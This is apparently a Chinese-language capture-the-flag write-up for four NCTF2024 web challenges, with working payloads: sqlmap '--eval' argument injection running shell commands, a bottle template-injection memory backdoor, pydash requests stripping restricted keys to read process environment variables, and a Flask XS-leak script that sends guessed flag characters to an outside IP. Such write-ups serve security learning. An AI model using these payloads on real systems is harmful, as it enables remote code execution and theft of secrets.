NCTF2024-web-wp

le0n

2025-03-24

writeup

这次咱08067的小登也是发力了，。

sqlmap-master

shell=flase，只能参数注入，sqlmap是提供了这个参数的

实测如果host不存在执行不了，而机器不出网，所以使用127.0.0.1

127.0.0.1 --eval=__import__('os').system('env>/app/index.html')

nctf{e3e4014b-fa3b-4bf7-b751-9ffd3a7633de}

ez_dash

%exec()能模板注入任意代码执行，没回显我们打内存马

__import__('sys').modules['__main__'].__dict__['bottle'].error(404)(lambda e:__import__('os').popen('env').read())

http://39.106.16.204:11883/render?path=aas123%0a%exec(%22__import__('sys')%22%2Bchr(46)%2B%22modules%5B'__main__'%5D%22%2Bchr(46)%2B%22__dict__%5B'bottle'%5D%22%2Bchr(46)%2B%22error(404)(lambda%20e%3A__import__('os')%22%2Bchr(46)%2B%22popen('env')%22%2Bchr(46)%2B%22read())%22)%0a

然后访问任意不存在的路由拿到flag

ez_dash_revenge

pydash最新版ban掉了__globals__和__builtins__，但这题依然能打，因为本身提供了访问globals

先把ban去掉，拿回属于我们的__globals__

1 2	http://127.0.0.1:8000/setValue?name=pydash {"path":"helpers.RESTRICTED_KEYS","value":""}

然后把模板路径改了，（直接用setval方法的全局作用域）

1 2	http://39.106.16.204:14955/setValue?name=setval {"path":"__globals__.bottle.TEMPLATE_PATH","value":["/proc/self/","/"]}

然后就能把environ渲染出来力

1	http://39.106.16.204:14955/render?path=environ

internal_api

简单的xleak，search成功与否返回不同的状态码

不太会js，只能让bot多访问几次sever（

from flask import Flask, render_template, request, render_template_string

app = Flask(import_name=__name__)
dic=[' ','-','a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z','0', '1', '2', '3', '4', '5', '6', '7', '8', '9']

FLAG = "nctf{"

@app.route('/')
def index():
    global FLAG
    html = '''
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Title</title>
    </head>
    <body>

    </body>

    '''
    for i in dic:
        html += f'''<script src="http://127.0.0.1:8000/internal/search?s={FLAG + i}" onload="fetch('http://115.120.246.103:1234/flag?c={FLAG + i}')"></script>'''
    return render_template_string(html)
@app.route('/flag',methods=['GET'])
def flag():
    global FLAG
    FLAG=request.args.get('c')
    print(FLAG)
    return "ok"
if __name__ == '__main__':
    app.run(host="0.0.0.0",port=1234)

NCTF2024-web-wp

sqlmap-master

ez_dash

ez_dash_revenge

internal_api

MISC

QRcode Reconstruction